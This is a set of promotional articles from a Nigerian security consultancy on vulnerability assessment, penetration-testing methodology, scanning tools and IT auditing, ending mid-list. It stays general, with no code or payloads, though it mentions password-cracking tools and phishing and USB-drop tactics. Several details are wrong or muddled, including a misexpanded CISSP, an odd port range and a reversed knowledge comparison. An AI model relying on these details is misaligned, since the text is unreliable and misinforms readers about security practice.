Now lets us understand what a network vulnerability assessment is as an entity of penetration testing. A network penetration testing is a penetration testing technique that involves reviewing and analyzing a network in order to discover any possible security loopholes and vulnerabilities. Network administrators and network security staff use this technique to do a thorough evaluation of their security architecture as well as to defend the computer network against any form of threats and vulnerabilities. It also helps them to assess the network to know its strength. But the key objective of this technique generally is to discover vulnerabilities that may compromise the overall privacy, security and operations of a computer network.

Network penetration testing Methodology

 

1. Data and Information gathering and project set up

This involves;

  • Reviewing the project to obtain all assumptions
  • Listing and detailing out the IP scanned IP addresses
  • Configuring the IDS and IPSes to accept the originating IP addresses
  • An optional scan of all user credentials
  • Obtaining contact information for both parties
  • Planning the scans and including the time it is being performed

2. Scanning the tools being setup

This step involves configuring all the vulnerability scanning tools for “safemode”

3. Performing the vulnerability scan

This involves performing and in-depth scan of all provided IP addresses and identifying any security weaknesses and vulnerabilities on user credentials after they have been scanned.

4. Research and Verification of vulnerabilities

This involves

  • Verifying all the discovered vulnerabilities
  • Identifying false positives
  • Determining any potential impacts of the vulnerabilities being exploited
  • Prioritizing remediation efforts
  • Developing specific plans and recommendations for the remediation

5. Create reports and a project close-out

This involves;

  • Delivering final and concluding reports
  • Teleconferencing of the scheduled project conclusions
  • Ensuring a full understanding of the remediation actions being recommended
  • Facilitating knowledge transfer in and effective form

Network Vulnerability Assessment Tools

In order to carry out an automates security audit in any organization, vulnerability scanners play a very critical role. This is because they can scan the website, network and other internal systems for thousands of security risks and can automatically prioritize them alongside the right patches. Some can automatically perform the patches.

Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all back-end components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.

1.OpenVas: This is a short for Open Vulnerability Assessment System and is a free network security tool that has most if its components licensed under GNU General Public License (GNL). This tools is very effective in scanning for thousands of vulnerabilities and supports concurrent and scheduled scans and tasks. Its main component is available as Linux packages and as virtual appliances that are downloadable for the purpose of testing and evaluation. OpenVas does not work on windows but it offers clients for windows platforms. It can run mainly on Linux platforms and can perform scans and receive over 33,000 updates daily of Network vulnerability tests.

OpenVas has a manager that controls its intelligence and it is command line based with full services of daemon for user management and feed management. It is not easy and quick to be installed but it has one of the richest features in It security scan.

2. Retina CS Community: This is a vulnerability scanning and patching tool for Microsoft and most third-party applications like Firefox, adobe etc. It can scan for vulnerabilities in mobile devices, virtualized applications, servers, web applications, and private clouds as well. It identifies missing patches and configuration issues. It has a software that which is called Retina Network Community which is to be installed first before actually installing the Retina Cs Community software. It works on windows server 2008 or later versions, Microsoft SQL 2008 version or its later versions and it also requires a .net framework 3.5 to be installed, it is IIS server enabled.

It gives you the option of choosing from a variety of scans with reporting templates which can specify IP address ranges. You could also provide any necessary credentials for scanned assets which may be required may make your reports come out in a readily and organized format including email alerts. Most businesses however may find its system requirements very stringent since it requires windows server.

3. Microsoft Baseline Security Analyzer (MBSA): This is a tool that can perform both local and remote scans on windows servers and desktop. These tools are very efficient because it can identify missing service packs, security patches and any common security misconfiguration. Platforms that support it are windows XP Windows 8 and 8.1, windows Server 2012 and windows server 2012 R2. It is an easy-to-understand tool and a straightforward tool as well. It provides options of selecting a single window machine to perform a scan where you can choose a name, specify IP addresses and even choose a domain. You could choose the platform you want to scan which can either be a Windows, IIS, SQL admin vulnerability, windows update or weak passwords.

5. SecureCheq: This is a tool that can perform local scans on both windows desktops and servers and is capable of identifying many insecure advanced windows settings such as COBIT, ISO, CIS standards. It deals majorly on common configuration errors which are related to OS hardening, communication security, data protection issues, audit logs and user account activities. Its free version can only perform less than 24 scans which is about a quarter of what its full version scans. SecureCheq is a simple tool which lists all the checked settings including passed or failed results. Even though it is easy to use and its ability to scan for advanced configuration settings, it cannot reach deep to scan general windows vulnerabilities and network based threats. But it however complements MBSA well enough by scanning for basic threats and performing a follow up scan using securecheq.

6. Qualys freeScan: This tool can perform about 10 free scans of URLs and IPs of local servers and machines on the internet. It can be downloaded from web portals which can be installed and run on virtual machines for scanning internal networks. It can scan for issues in SSL, and vulnerabilities in their related networks.

It may seem first see an online tool which appears to do scan via internet if you put in the local IP address, it prompts you to download to your system via virtual machines like VMware or VirtualBox image. This tool allows you to scan local networks and gives an interactive report of the threats and patches.

7. Wireshark: Wireshark, previously called Ethereal, is one of the most popularly used tools for network vulnerability testing or assessment. This is because it gives you a clear picture of happenings on your network. It works in promiscuous mode in order to capture all the traffic on a TCP broadcast domain. It has features of customized filters that can be configured to intercept specific traffic such as communication between two IP addresses, UDP-based DNS queries on that network.

Data obtained can be dumped into a capture file for later review. It can also look for stray IP addresses, unnecessary packet drops spoofed data packets and any suspicious single IP address. Although wireshark gives one a clearer and broader picture of the network activities, it however does not have its own intelligence and should therefore be used as a data provider.

8. Nmap: This has remained one of the most popular scanning tools for over a decade now. It has the capability of crafting data packets and perform scanning to a TCP granular level such as ACK, SYN scans etc. some of the characteristic of this tool include

  • Algorithms for built-in signatures designed to guess OSes and its versions based on the TCP handshake
  • It can detect remote devices on the network as well as firewalls, routers, and their models
  • It can check for open and running ports and which ports can be exploited for simulation of attacks
  • It gives results in plain text and verbose
  • It is scripted to automate routine task and obtain evidence for audit reports

9. Metasploit: Metasploit is a tool that comes to play after scanning and sniffing have been done. It provides the following capabilities;

  • It is a rigorous tool for performing scans against a set of IP addresses.
  • It can be used for anti-forensics
  • Programmers can write codes that can be used to exploit vulnerabilities and to test it on Metasploit if its working
  • It is a commercially available tool for performing virus attacks.

10. Aircrack: This is a network scanning tool that acts as a sniffer, packet crafter and decoder. It targets a wireless network by subjecting a packet traffic to capture vital information about a certain underlying encryption. A Decryptor is then used to perform a brute-force on the captured file to find passwords. Aircrack can be found in kali-linux which is the most preferable.

11. Nikto: This is an interactive open source tool for scanning websites because it supports HTTPS and HTTP. Nikto works by

  • Crawling a website like a human would do in a little amount of time
  • It uses a technique known as mutation to create combinations of various HTTP tests to perform an attack.
  • It finds critical loopholes like improper cookie handlings, XXL errors, upload misconfigurations etc.
  • It dumps all the findings in a verbose mode which can also help in knowing more about vulnerabilities in a website.

Care should be applied when interpreting Nikto logs because it can result in too many things getting noticed and can trigger a false alarm.

12. Samurai framework: It is used to for deep-diving after a baseline check has been done by Nikto. It is a powerful scanning utility which can be used to target specific set of vulnerabilities. It is pure penetration testing tool which focuses on other penetration tools such as WebScarab for HTTP mapping.

13. SQLmap: This tool is a first-generation tool capable of exploiting SQL injection errors but it can as well take over the database server. It works for speedy fingerprinting of the database to find underlying OSes and file system to fetch data from the server.

Note that a regular scheduled network vulnerability scan can help an organization to identify loopholes and weaknesses in a network even before any cybercriminal can perform a seeming attack. The aim of performing a network vulnerability is to identify devices on your network without compromising the systems on your network. Therefore, ensure to conduct a periodic network vulnerability scan on your network in order to discover and mitigate and possible weaknesses on you network before it can be exploited.

Why do you need the services of a Network Penetration Tester?

A network penetration tester is specially and specifically with trained the expertise to effectively conduct penetration testing and network assessments. Note that is a penetration is improperly conducted, it could be detrimental to your organization and its daily operations. Some of the skills a Network security specializes in are;

  • Data breach prevention
  • Application security
  • Security control testing
  • Gap analysis maintenance
  • Compliance testing and analysis

Who do you contact?

To get a range of services ranging from certifications and trainings in vulnerability and penetration testing and many more courses. We at Soutech web consults have a team of professionals that cannot only train you and your staff on vulnerability and penetration testing which is an entity of cyber security but also conduct them. Endeavour to visit us at soutech web consults or subscribe to our website to find out we can help your organization and your business mitigate any form network vulnerabilities by just implementing any of our test processes and technologies.

Vulnerability Testing: A Detailed Guide-SOUTECH guide

One of the major challenges which the cybersecurity world is facing is the way vulnerabilities are classified or grouped. Many security vendors, professionals and product developers have given different names the same type of vulnerabilities and it has grown to become a confusing idea to security practitioners when performing tests. This is the reason why some organisations such as CVE (Common Vulnerabilities and Exposures have come together to develop a common language for vulnerabilities.

The CVE which is sponsored by the Mitre Corporation, has set up a standard for which naming security vulnerabilities conventionally in other to make it easier to discuss, perform and document. A complete list of CVE for vulnerability testing can be downloaded from CVE.

CVE standard has been deployed by many security products to name but a few such as;

  • Nessus Security scanner
  • STAT (Security Threat Avoidance Technology
  • Internet Scanner by ISS (Internet Security Systems)

Types of Vulnerability Scanners

Vulnerability scanners can be classified into;

  1. Host Based vulnerability scanners
  • It identifies the issues that are inherent in the host system.
  • This process of scanning is performed by using host-based scanners to check for the vulnerabilities.
  • When the host-based tools load the mediator software to the target system, it traces the events that have occurred and sends the report to the security analyst for analysis and decide the next move.
  1. Network Based vulnerability scanners
  • This process is performed using Network-based Scanners.
  • The function of the network-based scanners is to detect the open ports, identify the unknown services and active and running ports.
  • It then gives a result of all the possible vulnerabilities that are associated with these services.
  1. Database Based Vulnerability scanners
  • The database -based vulnerability scanners will identify the security loopholes in the database
  • Here, tools and techniques are applied to test if the database is susceptible to SQL injections. The tester performs an SQL injecting SQL queries into the database in to read any sensitive data from the database. If there are any loopholes, the cyber security expert then updates the data in the data and tries to patch the security issue.

Steps for Performing Vulnerability Testing

The full methodologies on how to perform Vulnerability testing can be found in my previous article on vulnerability testing. I will describe briefly the steps that can be used to carry out any vulnerability test.

1.Check for Live Hosts: Here we have to check if the host is alive on the network. We can also

  • detect firewalls in the network
  • Probe for open ports such as UDP and TCP ports and other ports
  • TCP ports such as 1-111, 135,139, 443, 445 etc.
  • UDP ports such as 53, 111, 135, 137, 161 and 500

Whether or not the target is alive or offline, the scan can still be done.

2. Detect Firewalls: Here we try to determine there is a firewall in front of the target system. This is because some systems may appear to be offline but in the actually sense they are just protected by firewalls to be off and can still be open to attacks.

This test also attempts to gather a lot of network information from the target network especially when doing UDP and TCP probing.

3. Determine Open services and ports: In this step, we try to scan the UDP and TCP ports in other to discover the ports and services that are open. The ports to be probed are UDP and TCP ports 65-535 and in most setups, it is recommended to use the best scan probes to save the network bandwidth and the network time. So during the performance of an indepth scan, the use of full profiled scan probes are recommended.

4. Detection of Operating Systems and Versions: This involves discovering the OS versions and the services in other to optimize it. Once the process of UDP and TCP port scanning have been over, the pen tester uses different techniques in other to identify the OS that is running on the target host and network.

5. Perform a profiled Vulnerability scan: A profiled scan is applied in order to get an optimized vulnerability scanning result. Profiled scans include;

  • Best scan to get popular ports
  • Quick Scan to get most common ports
  • Firewall scan by performing stealth scan
  • Aggressive Scan by performing full scan, exploits and for DOS attacks

6. Developing a detailed Report: There are different formats to generate reports and the outputs of risk analysis and remediation suggestions. You can read the the OWASP full vulnerability scan documents to get a template for presenting your reports.

Vulnerability Testing Tools

Vulnerability testing tools can be classified into  Host-based tools and Data-based tools. I will describe a few tools which are efficient for performing vulnerability assessment.

Category

Tool

Description

Host-Based STAT It scans multiple systems on the network.
  TARA An acronym for Tiger Analytical Research Assistant. It is a unix-based system scanner which detects a set of known vulnerabilities in the local host of the network.
  Cain and Abel It can be used for cracking HTTP passwords and for retrieving passwords by sniffing the network.
  Metasploit It is an open source platform on linux for developing, testing and exploit of codes.
  WireShark This is an open Source network protocol analyzing tool that runs on both Linux and Windows platforms. Used to sniff the services running on the network.
  Nmap This is also an open source utility tool for carrying out security audits.
  Nessus This is an agent-less platform for auditing, reporting and carrying out patch management integration.
Database-based SQL diet A tool door for the SQL server for performing dictionary attacks.
  Secure Auditor It enables a user to carryout enumeration, network scanning, auditing and also perform penetration testing and forensic on the operating systems.
  DB-scan It is a tool used for the detection of trojans on the database, and also detecting hidden trojans by performing baseline scanning.

 

Advantages of Vulnerability Assessment

The common advantages of performing vulnerability assessments are;

  • There are readily available open source tools for performing vulnerability assessments.
  • It provides a platform to identify, detect and curb almost all vulnerabilities inherent on any system.
  • Some of the afore mentioned tools are automated for scanning.
  • These vulnerability assessment tools are easy to run on a regular basis.

Disadvantages of Vulnerability Assessment

  • There is an increase in the rate of false positive results
  • A vulnerability assessment tool can easily be detected by an Intrusion Detection System (IDS)/Firewall.
  • Sometimes recent and latest vulnerabilities can be hardly noticed.

Vulnerability Assessment vs Penetration Testing

Vulnerability Assessment Penetration Testing
Functionality To discover Vulnerabilities To Identify and exploit known vulnerabilities
Mechanism For discovery & scanning Perform simulations
Focal point Considers breadth over depth Considers depth over breadth
Coverage of Completeness High Low
Cost of Use Low to Moderate High
Tester House staff An attacker or Penetration Tester
Tester Knowledge High Low
How often is being run Run after every single equipment is loaded Run once in a year or quarterly depending on organizations policy
Results provided Gives partial and inconclusive details about the Vulnerabilities It gives a complete detail of all the  identified vulnerabilities

When performing vulnerability testing, you must know that it depends on two major mechanisms which are vulnerability assessment and penetration testing which I have been able to differentiate summarily. Now, these two test methods differ from each other in the areas of the tasks they perform and the weight of their performance levels.

However, if one must achieve a comprehensive and well detailed vulnerability testing with reports, a combination of both methods is always recommended.

We at Soutech web consults have a professional team that can carry out well organized and detailed vulnerability testing on your organization. Do well to contact us today on our website.

 

 

 

 

 

 

 

 

 

 

Performing a Detailed Penetration Testing: Soutech Ventures

Pen tests as we already know are intended to identify and confirm actual security breaches and to report such issues to management. This ensures that an organization experiences a balance in business and a good network security to ensure the smooth operation of business.

Just to reiterate as this is a follow up article to my basics on penetration testing, penetration testing colloquially called pen test refers to an ethical hacking method which is used to perform security testing on a computer network of an organization. It involves a lot of methodologies which I have already explained in my previous write up which is designed to explore a network for potential known vulnerabilities and to test them if they are real. A properly performed penetration test allows a network professional to fix issues within the network in order to improve the network security and provide the needed protection for the entire network against future cyber-attacks and intrusions.

The terms vulnerability assessment and penetration testing are often confused and I have made an attempt to differentiate them because they mean different things.

Pen tests involve methods require using legal permissions to exploit the network while vulnerability assessment requires evaluating the network, its systems and services for potential security problems. While a pen test is designed to perform simulated attacks, vulnerability assessments only require pure analysis and vetting of an organizations network for vulnerabilities. Note that no attack is launched.

Penetration Testing Services

I will describe 4 distinct penetration testing service offerings that we can provide you

1.Vulnerability Scanning: This scanning technique provides a very transparent and mature offer but the biggest challenge always lies on whether to resell a service offering or to buy that can be used to internally scan the clients’ systems and networks. Every regulation requires scanning which is the first and easy step taken towards achieving security assurance. This is because all regulated customers need to scan.

2. Penetration testing of Infrastructure: This offers tools such as Metasploit or Core Impact, that can be used to perform live exploits. Live ammunitions are used so you have to orchestrate or organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses because it is what the bad guys want in order to penetrate the system and network. The tester should also attach to the conference room network which is one of the softest parts of the customers’ defense.

3. Penetration of Applications: This is a very important step which involves an attempt to break into the applications because so many attacks are directly targeted at applications. Web applications such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit the application logic errors. Nothing stands a skilled application test because once an initial application is compromised, a direct access to the database where valuable data is easy. If the tester can access the database, then the customers system is owned already and scripts can be written to block every loop holes by the attacker.

4. User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives at the parking lot and watch out for people that will plug them. Social engineering is one of the key ways of information gathering and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.

 

The Qualifications of a Penetration Tester

The task of penetration testing can be performed by a qualified third-party agent as long as they are organizationally independent. What I mean is that they must be organizationally separate from the management of the client or the target system. Example, if we use a case study of a PCI DSS company as our assessment entity and as the third-party company carrying out the assessment, they cannot conduct the pen test because they’re involved in the installation, maintenance or as support to the target systems.

The following guidelines can be useful in your choice for a good and qualified penetration tester

Certifications for a penetration tester: The certifications which a penetration tester hold is a very indicative guide to their level of competence and skill. While these certifications may not be required, they can indicate a common body of knowledge for the tester. These are the few among’st many certifications a penetration tester can have;

  • Certified Ethical Hacker (CEH)
  • Offensive Security Certified Professional (OSCP)
  • Global Information Assurance Certification (GIAC)
  • Computer Information System Security Professional (CISSP)
  • GIAC Certified Penetration tester (GPEN)
  • EC-Council Security Analyst (ECSA)
  • Licensed Penetration Tester (LPT)
  • GIAC Exploit Researcher and Advanced Penetration tester (GXPN)

Always remember that before any test begins, all parties are recommended to be involved such as the organization, pen tester, the assessor where applicable. They all must be aware of the types of test being performed i.e. external, internal, network layer or application and how the test will be performed and the target.

Steps to Perform a Detailed Penetration Testing

1.Scoping of the organization: The responsibility of the organization is to the adequately define the critical systems. The normal recommendation is that the organization works hand in hand with the pen tester whenever it is applicable. The assessor also plays major role here to verify that none of the components are overlooked and also to determine if there are additional systems to include in the scope. The scope of the penetration test should include the critical systems, the access points and the methods for segmentation.

2. Documentation: All components within the scope of the documentation should be made available to the tester whenever necessary. Documents include,

  • Application interface documentation
  • Guides to the implementation

This will help the tester to understand the functionality of the system. Other information which the organization needs to supply the tester should include

  • Network diagram. showing all the network segments.
  • Data flow diagram
  • Detailed list of all services and ports that are being exposed to the perimeter.
  • List of the network segments in isolation

A typical network diagram showing      the  network architecture

 

The pen tester uses all this information to assess and identify all unexpected attack vectors and any insufficient authentication controls.

3. Rules of Engagement: Before any test begins, it is very important to agree and document on conditions and terms in which the test is being performed and the extent to the level of exploitation. This gives the pen tester the authority to the test environment and to make sure the organization has an understanding of test and what to expect from it. The following are what to consider as rules of engagement

  • Window time will the test be performed?
  • What are the known issues in the system and issues with automated scanning? And if so, will such systems still be tested?
  • Any preferred methods of communication about the scope and any issues that will be encountered in the course of the test.
  • Any security controls could detect the testing?
  • Are there passwords or any sensitive data to be exposed during the test.
  • If the equipment to be used by the tester will pose any threats to the systems in the organization.
  • Any updated OSes, service packs and patches and if the tester should provide all the IP addresses for which the test will originate.
  • What steps the tester should take when he detects any flaw or loophole.
  • Will the tester retain any data obtained during the tester?

4. Third-party Hosted/Cloud environments: The following should be added to the rules of engagement.

  • Before test commences, if the service-level agreement requires any approval from the third-party.
  • Web management portals that are provided to manage the infrastructure by the third-party should not be included unless noted in the scope.

5. Criteria for success: Pen testing is supposed to simulate a real-world attack with the aim of identifying the extent an attacker can go to penetrate the systems. Therefore, defining the success criteria for the pen test will allow the entity to program limits for the pen test. Success criteria should be included in the rules of engagement and should include

  • Restricted services or data should be directly observed in the absence of access controls
  • Level of compromise of the domain being used by legitimate users.

6. Review of past vulnerabilities and threats: this involves a review and a consideration of all the threats and vulnerabilities that were encountered in the last 12 months. It is more like an historical look into the organizations environment since the last assessment was performed. This information is very important to give insights on how to handle the current vulnerabilities. Depending on whether it is a white box, grey box or black box test that is to be performed, these are not to be included in the review.

  • Vulnerabilities being discovered by the organization and have not be solved within a certain time.
  • Compensation controls preventing the discovered vulnerabilities
  • Upgrades or deployments that are in progress
  • Threats and vulnerabilities that have led to a possible data breach
  • Valid remediation of pen test in the past years.

7. Segmentation: This is done by conducting test used during the initial stage of the network penetration such as port scans, host discovery. It is performed to verify that all the isolated LANs do not have access to the database. Testing each of these unique segments should ensure that security controls are working normally as intended. The pen tester should check the LAN segments that they have access to the organization and restrict access.

8. Post Exploitation: This means taking actions after an initial compromise of the system. It refers to the methodical approach of making use of pivoting techniques and privilege escalation to establish a new source of attack. This can be done from a vintage point in the system in order to gain access to the network resources.

9. Post- Engagement: the following activities should be done after the engagement or testing are being performed:

  • Remediation best practices
  • Retesting all the identified vulnerabilities

10. Cleaning up of the work Environment: After the pen test has been performed, it is necessary to do a thorough cleanup of the working environment. The tester does some documentation and informs the organization of any alterations that have been made to the environment. These include but not limited:

  • Installed tools by the tester on the organizations system
  • Created accounts during part of the assessment
  • Changed passwords for accounts
  • Any additional documents not related to the organization

11. Reporting and Documentation: Report helps an organization in their efforts to improve upon their security posture and also to identify any areas that are vulnerable to threats. A report should be structured in a such a way that it the test is clearly communicated, how it was carried out. The report should be done in the following steps;

  • Report identified vulnerabilities
  • Any firewall mis-configurations
  • Report of detected credentials that were obtained through manipulation of the web application.The service of penetration testing is a typical learning experience for everyone in the organization that is involved in it as well as the tester. The testers get to discover and learn what it is that works and what does not work and is not obtainable to the entity being tested. They can also learn how to find ways to adapt to the defenses of the customer. The client i.e the organization gets to learn of what they should have known and done that is less effective and finally learn and appreciate what is applicable. The pen tester now tries to pick the pieces and build a strong and long-term relationship with the client.

We at soutech web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and team to conduct a well detailed and professional penetration testing. Subscribe for our services today.

 

 

 

Why do you need a Vulnerability Test? Concepts and Methodologies

First of all, let us understand what a vulnerability is. I’ll define a vulnerability as any form of loophole, a weakness or mistake that can be found in a system security design, its implementation, security procedures, or its control that can lead to systems security policy violation. A vulnerability can make it possible for cybercriminal or attacker to gain unauthorized access to the system.

As we already know, confidentiality, integrity and availability which are the three cores of IT security. Once any or all of these elements are compromised, then one can say there is a security vulnerability. Infact, a single security vulnerability has the potential of compromising one or all of these elements. For example, the confidentiality can be compromised if there is an information disclosure vulnerability while the compromise of integrity and availability can be as a result of remote code execution.

What is Vulnerability Testing?

It can also be referred to as vulnerability assessment which is a software testing technique that is conducted in order to evaluate the inherent risk in an IT system and measures employed to reduce or curb the probability of the event.

Vulnerability testing has some similarities with risk assessment and these assessments can be performed following some steps as highlighted below.

  • Developing a catalogue for assets and resources in the system.
  • Assigning rank orders to quantify resources by value and importance.
  • Identifying the potential threats and vulnerabilities to the resources.
  • Eliminating totally or mitigating the high ranked vulnerabilities for the most valuable resources.

Vulnerability testing depends majorly on 2 mechanisms

  • Vulnerability assessment
  • Penetration testing

Objectives of Vulnerability Testing

The common goals and objectives of risk and vulnerability assessments are as follows;

  • To get an accurate inventory of all data and IT assets.
  • To prioritize organizational IT and data assets according to the importance and criticality to the organization
  • To identify and document all the potential risks, threats and vulnerabilities to the organizational infrastructural assets.
  • To prioritize the potential risks, threats and known vulnerabilities based on their impact or criticality on the IT or data assets being affected.
  • To identify and minimize the vulnerability window of the organizational IT and data assets according to the minimum acceptable tolerance level.
  • To curb, mitigate or remediate the identified risks, threats and vulnerabilities and properly plan and budget them based on the criticality of the IT and data assets.
  • To check for compliance with the updated information security laws, regulations, procedures and mandates
  • Just as explained previously, it helps to identify lapses, voids and gaps in the organizations IT security framework and architecture by looking out for specific recommendations.
  • To identify the potential risks, threats and vulnerabilities that an organization’s is susceptible to and to find ways to justify the cost of all the security countermeasures and solutions to be adopted in order to mitigate, eliminate or reduce the identified risks, threats and vulnerabilities.
  • To provide an objective assessment and prompt recommendation to help define the organizations goals and objectives for performing risk and vulnerability assessment.
  • It helps organizations to understand the return on investments (ROI) whenever funds are to be invested in the IT security infrastructure.
  • To scan operating systems, application softwares and the entire network for known vulnerabilities such as insecure authentications and software designs.

                                 Scope of Vulnerability Testing

 

  1. Black Box Testing: It involves performing vulnerability testing from an external network with no prior knowledge of the internal network infrastructure and systems.
  2. White box testing: It involves performing vulnerability testing within an internal network with prior knowledge of the internal network infrastructure and systems. White box testing can also be referred to as internal testing.
  3. Grey box testing: It involves performing vulnerability testing from either an external or internal network with little knowledge of the internal network infrastructure and system. It involves the combination of black box ad white box testing.

Elements of Vulnerability Testing

  • Information Gathering: This can also be referred to as reconnaissance and it deals with obtaining as much information as possible about an IT environment. Information such as Networks, IP addresses, versions of operating systems in use etc. and it is applicable to the 3 scopes of vulnerability assessment.
  • Detection of vulnerability: This process involves the use of vulnerability scanners to scan the IT environment to identify the unknown and potential vulnerabilities.
  • Information analysis and planning: It involves the analysis of all the vulnerabilities that have been identified and further devising a means to penetrate into the network and the systems.

Types of Vulnerability Test

  1. Predefined Tests: These is a vulnerability test that is designed to discover some common vulnerabilities in databases and its environments. Predefined tests can be customized to suit the needs or requirements of an organization. Predefined tests include;
  • Configuration Tests: It checks a database for all configuration settings realted ti security. It looks out for common flaws and mistakes in database configurations. Such configuration issues include;
  • Privelege which include; system level rights, privilege access to database and users, rights of use and creation of objects
  • Configuration: Which include parameter settings for the database and parameter settings for the system level.
  • Authentication: It includes, use of accounts by users, use of remote logins, password policies.
  • Version: This includes, versions of the database and patches for the database.
  • Object: It involves sample databases that have been installed, database layouts that have been recommended and ownership of the databases.
  • Behavioral Tests: This test type checks and analyses the security posture and wellbeing of the database environment. It does this by observing the database when it is in real time mode and checking how information is manipulated. Some of the behavioral tests include;
  • Violations of access rules
  • Failures in excessive logins
  • Errors in the excessive SQL
  • Access to default users
  • Logins at after hours
  • Execution of DDL, DBCC commands from the client side of the database
  • Calls for stored procedure checks
  • Ensures user ids are not accessed from multiple IP addresses
  1. Query- based vulnerability tests: This test type can either be a pre-defined test or a user-defined test that can be created easily and quickly by modifying SQL queries which can be run against database entities or resources.
  2. CVE (Common Vulnerabilities and Exposures) Tests: This test type monitors and exposes common vulnerabilities from the MITRE corporation and further adds the results of the test for related vulnerabilities that are related to the database.
  3. CAS-based Tests: This test type can either be a predefined test or a user-defined test which is based on the template of a CAS item found in the OS script command. It uses the collected data. Users can therefore check which of the template items and tests against the contents in the CAS results.

Vulnerability Testing Methodologies

  1. Setup:
  • Begin the documentation process of all assets
  • Secure permissions to credentials and assets
  • Perform tools update
  • Configure the tools
  1. Execute the Test
  • Run the tools to begin execution
  • Run all the data packets captured (A packet is a unit of data that is crafted to be routed from a source to destination). If a file whether email, HTML, or URL request is being sent from a particular point to another on the internet, the TCP layer of TCP/IP will divide the file into small chunks each having a sequence number on the headers for efficient routing. Now, these small individual chunks are referred to as packets. On the destination end, the packets reassemble to form the original file that was sent while running the assessment tools.
  1. Analyze the vulnerabilities:
  • Define and classify the system resources as well as the network
  • Prioritize the resources based on their importance such as High, Medium, low
  • Identify all potential threats to the assets
  • Based on the priorities, develop a strategy to first handle the most prioritized problems
  • Define and implement measures to mitigate or minimize the consequences of the occurrence of an attack.
  1. Form a Report: Develop a report of all the steps you took to arrive at your results. The report is also important in order to guide to aid future understanding of the system and as well to report to the management of the organization.
  2. Remediation plans: This process involves developing measures and taking the appropriate steps to fix the vulnerabilities.

Responsibilities of a Vulnerability Tester

  1. Unit management such as Information Security Coordinators and Unit IT supervisors
  • They support and enforce the standards, approve and submit the annual risk assessment documents to management
  • They determine the person who maintains the documentation.
  • They also request for the internal audits, procure and assign the necessary resources that are needed to implement the standards and polices.
  • They notify the users and support staff who are involved in performing the test.
  • The also request for any exceptions
  • They supervise and coordinate the vulnerability test and also the remediation processes.
  1. The System administrator and Computing device Administrator
  • They implement the best practices which are needed to comply with the test.
  • They support and comply with the policies.
  • They scan all the systems in the network for compliance to standards devices.
  • They monitor the systems actively for any available patches in other to remediate tasks that can affect the user.
  1. Information security Officer
  • These people approve and oversee the all the vulnerability scans.
  • They review and approve the use of any alternative scanning tools when required.
  • They conduct reviews and risk assessments annually.
  • They authorize the removal of network devices from the network when needed.

 Vulnerability testing focuses more on determining loopholes and weaknesses in an IT infrastructure. In my next article i will try to shed some more light on the tools which can use to perform vulnerability since we already have the standard methodologies to follow in order to perform a detailed vulnerability test.

Soutech ventures offers courses that can better equip and train you on all you need to know with practical hands-on knowledge on vulnerability assessment. Subscribe to our CEH course today on www.soutechventures.com/courses

 

 

A step by step Guide for IT Auditing: SOUTECH Web Security- Penetration Testing company in Nigeria

IT audit attempts to evaluate the controls surrounding data as it relates to confidentiality, integrity, and availability. IT audits ensure that confidentiality of information, ensures the integrity and availability which is a key factor to recovering from an incident.

This is a follow up article to on IT audits but I will be dissecting more on the methodologies and steps to performing audits

 

One of the challenges that audit managements and IT auditing have faced overtime is that it ensures IT audit resources are readily available to conduct IT audits. It audits require a lot of technical skills unlike financial audits, for example, an IT auditor will need a lot of training in web applications in other to audit a web application. Likewise, if they want to an oracle audit, they need to be trained efficiently as well as Windows platforms.

Another problem that audit management faces is in the management of IT auditors, because this because they have to track the timing when compared with the objectives of the audit as well as follow-up time on the measures of corrective actions that the clients take when responding to any previous recommendations and possible findings.

One of the important factors in IT auditing and one in which audit management struggles with consistently, is to ensure that adequate IT audit resources are available to perform the IT audits. Financial audits quite unlike IT audits are very intensive in terms of knowledge, for example, if an IT auditor is performing a Web Application audit, then they need to be trained in web applications; if they are doing an Oracle database audit, they need to be trained in Oracle; if they are doing a Windows operating system audit, they need to have some training in Windows and not just XP, they’ll need exposure to Vista, Windows 7, Server 2003, Server 2008, IIS, SQL-Server, Exchange.

 

Another factor that audit management faces is the actual management of the IT auditors, for not only must they track time against audit objectives, audit management must allow for time to follow-up on corrective actions taken by the client in response to previous findings and/or recommendations.The following are the things that an IT expert needs to do before beginning an audit;

  • Perform a review of the organizational structure of the IT assets
  • Perform a review of all IT policies and procedures
  • Perform a review of all the IT standards
  • Perform a review of the IT documentations
  • Perform a review of the organization’s BIA
  • Conduct an interview the authorized personnel
  • Observe and monitor the processes and the performance of the employees
  • Examine the testing of controls, and the results gotten from the tests.

Steps to Perform IT Audits

1. Understand the Audit Subject Area

  • Perform a tour of all the facilities related to audit
  • Perform a review of the background materials
  • Review the IT and business strategic plans
  • Conduct an interview for the key managers in order to understand business
  • Review audit reports that have been in existence
  • Identify regulations and where they have been applied
  • Identify the areas that have been outsourced

 2.  Perform an Audit Engagement Plan Vocabulary

Subject of the Audit: The area that is to be audited. An example is the information systems related to sales

The objective of the Audit: The purpose of performing the audit. An example is determining if the sales database is safe against data breaches, due to inappropriate authentication, access control, or hacking.

Scope of the Audit:  Streamlining the audit to a specific system, function, or unit, or period of time. An example is the is determining if the scope is constrained to Headquarters for the last year.

3.  Perform Risk Assessment: Risk-Based Auditing

Check Inherent Risk: Determine the susceptibility of the system to a risk. An example is a bank’s inherent risk of being robbed.

Control the risk: If a problem exists that will not be detected by an internal control system. Still using the bank case as an example, if a thief accesses a customer’s account at Money Machine and is not detected

Detection of Risk: An auditor does not detect a problem that does exist. Example as in the case of the bank, if a fraud takes but it is not detected.

Perform an overall risk auditing: Combine all the audit risks.

4.   Audit Engagement Risk Analysis

5.   Prepare an Audit Engagement Plan

  • Develop a risk-based approach
  • Include audit objectives, required resources, timing, scope
  • Comply with all applicable laws
  • Develop an audit program and procedures

6.  Add Detail to Plan

7.  Evaluate Controls:

8. Classification of IT controls

  • Corrective controls: It involves fixing the problems to prevent future problems by using:
